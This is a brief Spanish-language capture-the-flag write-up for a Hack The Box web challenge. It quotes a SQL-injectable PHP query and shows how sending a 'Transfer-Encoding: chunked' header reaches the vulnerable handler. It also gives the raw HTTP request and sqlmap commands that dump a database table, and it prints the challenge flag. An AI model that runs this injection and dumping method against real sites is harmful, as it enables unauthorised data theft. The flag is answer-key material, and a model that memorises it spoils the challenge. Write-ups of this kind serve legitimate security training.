0xBOverchunked

Challenge Description

Are you able to retrieve the 6th character from the database?

Categoria: Web
Dificultad: Fácil
Puntos: 20

Solution

En el codigo podemos ver que es vulnerable a sql injection la siguiente linea Cursor.php.

$stmt = $pdo->query("SELECT id, gamename, gamedesc, image FROM posts WHERE id = '$id'");

Esta es llamada en SearchHandler.php.

if (isset($_SERVER["HTTP_TRANSFER_ENCODING"]) && $_SERVER["HTTP_TRANSFER_ENCODING"] == "chunked")
{
    $search = $_POST['search'];

    $result = unsafequery($pdo, $search);
    echo $result;

Solo es cuestion de agregar el header Transfer-Encoding: chunked y podemos explotar el sqli para obtener la flag.

POST /Controllers/Handlers/SearchHandler.php HTTP/1.1
Host: 83.136.254.13:49556
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 8
Origin: http://83.136.254.13:49556
Connection: close
Referer: http://83.136.254.13:49556/
Transfer-Encoding: chunked

search=1

Utilizamos sqlmap para este proceso.

sqlmap -r req.txt -p search --level 5 --risk 3 --dbms=sqlite --ignore-code=500

sqlmap -r req.txt -p search --level 5 --risk 3 --dbms=sqlite --ignore-code=500 -T posts -C gamedesc --dump

HTB{tr4nsf3r_3Nc0d1Ng_4t_1ts_f1n3st}